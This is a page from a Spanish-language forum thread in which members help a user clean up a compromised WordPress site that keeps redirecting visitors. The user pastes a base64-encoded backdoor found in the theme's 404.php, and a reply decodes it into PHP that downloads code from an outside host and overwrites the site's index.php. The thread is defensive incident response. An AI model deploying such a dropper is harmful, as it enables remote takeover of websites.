elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web (Moderador: #!drvy)
| | |-+  Mi Wordpress Hackeado
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 Ir Abajo Respuesta Imprimir
Autor Tema: Mi Wordpress Hackeado  (Leído 36,671 veces)
ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #10 en: 24 Julio 2014, 21:00 pm »

El "malware" al parecer solo afecta a las redirecciones 404. Archivos normales funcionan bien.
Código:
http://www.wilboradalibros.com.ar/readme.html

Me he fijado que existe un index.php pero esta vacio. Podrías mirar a ver si tiene algo sospechoso ? Aparte, intenta buscar algún archivo que tenga error404 o 404 o algo así en el nombre.. si existe, muestra a ver cual es su contenido.

PD: Las urls ponlas entre etiquetas geshi para evitar que otros usuarios las visiten sin querer.


Edit:

Código:
http://www.wilboradalibros.com.ar/wp-login.php

Lanza errores PHP que dicen que no puede modificar los headers. Apunta a la linea 154 en /wp-includes/functions.wp-scripts.php

Saludos

#!drvy MUCHAS GRACIAS por tu tiempo. Miré el archivo .php y está completamente vacío.
Lo que no entendí es tus últimas 2 líneas que debo hacer con la línea 154. Podrías aclararmelo?

Nuevamente muchas gracias!!

EDIT:

La línea 154, tiene esto:

Código
  1. * Do not allow accidental or negligent de-registering of critical scripts in the admin.
  2. * Show minimal remorse if the correct hook is used.
  3. */
  4. $current_filter = current_filter();
  5. if ( ( is_admin() && 'admin_enqueue_scripts' !== $current_filter ) ||
  6. ( 'wp-login.php' === $GLOBALS['pagenow'] && 'login_enqueue_scripts' !== $current_filter )
  7. ) {
  8. $no = array(
  9. 'jquery', 'jquery-core', 'jquery-migrate', 'jquery-ui-core', 'jquery-ui-accordion',
  10. 'jquery-ui-autocomplete', 'jquery-ui-button', 'jquery-ui-datepicker', 'jquery-ui-dialog',
  11. 'jquery-ui-draggable', 'jquery-ui-droppable', 'jquery-ui-menu', 'jquery-ui-mouse',
  12. 'jquery-ui-position', 'jquery-ui-progressbar', 'jquery-ui-resizable', 'jquery-ui-selectable',
  13. 'jquery-ui-slider', 'jquery-ui-sortable', 'jquery-ui-spinner', 'jquery-ui-tabs',
  14. 'jquery-ui-tooltip', 'jquery-ui-widget', 'underscore', 'backbone',
  15. );
  16.  
  17. if ( in_array( $handle, $no ) ) {
  18. $message = sprintf( __( 'Do not deregister the %1$s script in the administration area. To target the frontend theme, use the %2$s hook.' ),
  19. "<code>$handle</code>", '<code>wp_enqueue_scripts</code>' );
  20. _doing_it_wrong( __FUNCTION__, $message, '3.6' );
  21. return;
  22. }
  23. }
  24.  
  25. $wp_scripts->remove( $handle );
  26. }
  27.  
  28. /**


« Última modificación: 24 Julio 2014, 21:05 pm por ka0s » En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #11 en: 24 Julio 2014, 21:03 pm »

Mas bien afecta a las direcciones no fisicas:

Ninguna de las paginas de google me funcionan:

https://www.google.com/#q=site:wilboradalibros.com.ar

Pero archivos y carpetas de verdad si:

Código:
http://wilboradaslibros.com.ar/wp-admin/

Por cierto estos errores le salian a la dueña antes?

Código:
Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900

Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.


En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #12 en: 24 Julio 2014, 21:07 pm »

Mas bien afecta a las direcciones no fisicas:

Ninguna de las paginas de google me funcionan:

https://www.google.com/#q=site:wilboradalibros.com.ar

Pero archivos y carpetas de verdad si:

Código:
http://wilboradaslibros.com.ar/wp-admin/

Por cierto estos errores le salian a la dueña antes?

Código:
Notice: Undefined index: pagenow in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php on line 154

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 414

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-login.php on line 426

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 883

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 884

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 885

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 886

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 887

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 888

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 891

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 892

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 893

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 894

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 897

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 898

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 899

Warning: Cannot modify header information - headers already sent by (output started at /www/docs/wilboradalibros.com.ar/public_html/wp-includes/functions.wp-scripts.php:154) in /www/docs/wilboradalibros.com.ar/public_html/wp-includes/pluggable.php on line 900

Eso de cannot modify header information me huele a que esta tratando de hacer un redirect usando la header location.

No eso no le salía. Siempre me dijo que se le redireccionaba su web sin ver errores.
Que complicado se está volviendo esto :(.
PD: Arriba edite el post y puse el código de la línea 154 que comentaba #!drvy
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #13 en: 24 Julio 2014, 21:19 pm »

¿Puedes poner lo que dice en:

wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.

Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.
« Última modificación: 24 Julio 2014, 21:21 pm por MinusFour » En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #14 en: 24 Julio 2014, 21:29 pm »

¿Puedes poner lo que dice en:

wp-includes/pluggable.php, de las lineas 883 a 900? Creo que te pudieron haber modificado ese archivo o tienes algún plugin que este haciendo destrozos.

Diría que si tu base de datos no ha sido dañada, desactiva todos tus plugins y vuelve a re instalar wordpress.

De la 875 a 902 dice es esto: (Te lo paso completo para que no quede en partes)

Código
  1. function wp_clear_auth_cookie() {
  2. /**
  3. * Fires just before the authentication cookies are cleared.
  4. *
  5. * @since 2.7.0
  6. */
  7. do_action( 'clear_auth_cookie' );
  8.  
  9. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
  10. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, ADMIN_COOKIE_PATH,   COOKIE_DOMAIN );
  11. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
  12. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, PLUGINS_COOKIE_PATH, COOKIE_DOMAIN );
  13. setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,          COOKIE_DOMAIN );
  14. setcookie( LOGGED_IN_COOKIE,   ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH,      COOKIE_DOMAIN );
  15.  
  16. // Old cookies
  17. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  18. setcookie( AUTH_COOKIE,        ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  19. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  20. setcookie( SECURE_AUTH_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  21.  
  22. // Even older cookies
  23. setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  24. setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, COOKIEPATH,     COOKIE_DOMAIN );
  25. setcookie( USER_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  26. setcookie( PASS_COOKIE, ' ', time() - YEAR_IN_SECONDS, SITECOOKIEPATH, COOKIE_DOMAIN );
  27. }
  28. endif;

A partir del primer setcookie sería 883 la línea.
En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #15 en: 24 Julio 2014, 21:39 pm »

He puesto a funcionar desde el Wordpress mismo un Anti-Malware y me ha encontrado el siguiente backdoor en el archivo 404.php de  wp-content/themes



Cuando me dirigi a la ruta para verlo, lo que tenía ese archivo era esto:

Código
  1. ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUm1ORmFGVmliSEJvVldwR1lXSldjRVpoUnpsT1VsZDRSbFJWWkd0VE1ERjBXak5rWVZKWGFFTlViWFEwVGxVNVdWUnNjRmRsYTFvelYxUkpkMDVYVWxkaVJsSlBWakpvY0ZWcVJtRk9WbEpJVFVSV2JGWnVRVEZVTVdoRFlWZEtWMU51VG1GV1ZUQjRWRlZrVjFOV1ZsaE9Wa0pyVFdwc2VWZFVRbXRTTURGSVVtdFNVbFpIZUV0VmFrcFRZekZ3UmxwR1pHdFdNVXAzVjJwS2MxVXhTbFZpUlZaWFlrWldORlZ0ZUZOak1WWjBWMnhhYUdWdGVGSldiWFJQVTIxT1JtVklRbHBOYWxaUldrUkpOVlJHYkZkYVJuQnBUV3RhV2xaSE1XRlpWa2w1WlVSV1ZFMUZOVlJhUkVaelYxWldkRTlWTVdoV01EUjVWMnRTVDFGdFVrZGhNMnhRVjBaYWNsVnFSbUZOVm5CR1ZHMXdhbEpYZUVkVmJYTTFWVEZGZDFOdVpGcGxhMVV4V1ZSS1IxZFdUbGhQVlhSVVVsVndkbGRyVm10aWJWSldZMFJXVUZaRk5YRlZXSEJIWWpGa2Nsa3phR3BTTUhCM1YxUk9RMU5zU2xaWGJFSldZVEExUTFkcVNrZFhWbEowVjIxR1UwMXVaekZWZWtKUFZUSlJlR0pHYkZaaVZHeE9XVlprVDAxc2NFVlVhMHByVWpCYVdWUnNaSGRo.Vms1SFYyNUtXR0pIYUU5WmJYUXdWa2RLUlZwRlVtaFdhM0I0VjFkd1MxVXlTa2RSYkZKU1lsUkdiMVpxVG05ak1XUkZVMjEwYVZJeFNraFVNV1IzWVZVeGNWWllaRmhpUjAxNFZGVmtUMDVXYjNsa1JuQk9ZVzE0ZVZZeWVGcE9WVEZJVm10c1ZsZEZTbEZhUkVrMVkyeHNWMWw2Um1oTldFSmFXVlZrWVdGc1NYZFhXR1JhVmxVMVExUXhWbk5TUmxaMVdrWndXRkpyY0RKV1JXUnpZVzFTZEZKc2FFOVdNMUpvVmpCa2EwMVdhM2RhUnpsci5UVWhCTWxsNlFqQlRiRVYzVW0wMVZGWlZOVU5YYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSV2hwVW5wR1RWVnFSbmRrTVd4eVdrWmtZV0pWTlVwV2JYQkRWMVV4Y2s1VVNscGlWRlpVV1d0a1MyUldWblZqUlhoU1RWVndNMWRYTUhoVk1rcElWbXRrVUZkSFVtRldNRnBMWkd4U1JsUnJTbWhOVjNRMVZERmtNRmxXVlhsa1NHUmhWMGRTTWxkcVFuTlNSa1pZV2tWd1VrMUZXblZWTVZaUFVXeHZkMkpGVWxKV01sSkxWVlJDUjJKc1pITmFSVGxwVFd0dk1WVldZekZWVmtsNFkwUktXbUpVVmxOWGFrWnlaVlU1V1ZSdGJFNU5SM014VlRGak1WTXlTa2RqUlZKVVZYcFdjUzVaVldoS1lqQTFSVlJZUWsxaGVsWkdWVlpTVjFOc1NsZFhhbFphVFdwQk1WcFdXa05TUlRsWVRWZHNUbUZzVmpOV1ZXUnpZV3MwZVZkc2FGZGlhelZ4VkZkNFdrMHhSWGxpUlVwaFR.VZDRSVlZXWkd0VGJFVjNVbTAxVkZaVk5VTlhha0p6VWtaR1dGcEZjRkpOUlhCNlZqRlNTMkl5VW5KaVJWSmFaVzFvYUZsc1VuTk5WbkJHVkd0T2FHSlZiRFZhVldoaFlXMUdjVkZ1UWxwTmFrWllXVlJDYzJOVk5WWlhiWEJwWVROQmVWZFVTbmROTWxKelkwaFNVRmRHV25KVmExSlRaRlpSZWxwSVdtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlhiWGhIWkd4dmVWZHNhRmRpYXpWeFZGZDRXazB4UlhsTlZtUm9ZbFZhU1ZRd1pHdFRNREZ6VjJwV1drMXFRVEZhVmxaM1RtMU5kMlJITVZaV2VteE5VekZPY2s1NWEzQlBkeWtwT3cpKTs

BORRÉ EL ARCHIVO, pero intenté acceder a la web y sigue redireccionandosé!! :(
En línea

MinusFour
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.529


I'm fourth.


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #16 en: 24 Julio 2014, 21:48 pm »

Eso es base 64 y se traduce a:

Código
  1. $code_txt = 'http://lamirona.aler.org/index.txt';
  2. $path = getenv("DOCUMENT_ROOT").'';
  3.  
  4. if(is_dir($path.'/wp-content') AND is_dir($path.'/wp-admin') AND  is_dir($path.'/wp-includes')){
  5. $code= file_get_contents($code_txt);
  6. $index_path = $path.'/index.php';
  7.                if(file_put_contents($index_path, $code)){
  8.                echo '<font color="red"7409 Error</font>';}else{
  9.                echo '<font color="red">Error</font>';
  10.                }
  11. }else{
  12. echo 'error';
  13. }

Seguro que no había nada raro en el index.php?
En línea

#!drvy
Moderador
***
Desconectado Desconectado

Mensajes: 5.855



Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #17 en: 24 Julio 2014, 21:52 pm »

En realidad ese script ha hecho su trabajo xD

Código:
http://lamirona.aler.org/index.txt
Esta vació y por eso el index.php esta vació :P

ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ?

Saludos
En línea

EFEX


Desconectado Desconectado

Mensajes: 1.171


"Dinero Facil"


Ver Perfil WWW
Re: Mi Wordpress Hackeado
« Respuesta #18 en: 24 Julio 2014, 21:56 pm »

Yo miraria en wp-includes que archivos fueron los ultimos en ser modificados.
En línea

ka0s


Desconectado Desconectado

Mensajes: 308


Ver Perfil
Re: Mi Wordpress Hackeado
« Respuesta #19 en: 24 Julio 2014, 21:56 pm »

En realidad ese script ha hecho su trabajo xD

Código:
http://lamirona.aler.org/index.txt
Esta vació y por eso el index.php esta vació :P

ka0s los demás archivos sospechosos que te ha reportado el plugin ese cuales son ?

Saludos

Este es el reporte precisamente:



Gracias por responder tan rápido y dedicarle su tiempo a mi ayuda. Creo que estamos cerca... :)
En línea

Páginas: 1 [2] 3 4 5 6 7 8 9 10 11 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
RIN.ru Hackeado
Juegos y Consolas
::GD:: 3 3,774 Último mensaje 30 Marzo 2005, 03:57 am
por ::GD::
Ataque DDoS a WordPress : WordPress sufre el mayor ataque DDoS
Noticias
wolfbcn 0 4,614 Último mensaje 4 Marzo 2011, 13:17 pm
por wolfbcn
Me han hackeado
Seguridad
###almohadilla 1 2,688 Último mensaje 4 Abril 2014, 09:50 am
por dRak0
[WordPress] ¿ Cómo añadir una entrada en WordPress 3.8.2 ?
Desarrollo Web
0x5d 3 5,141 Último mensaje 12 Abril 2014, 06:47 am
por 0x5d
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines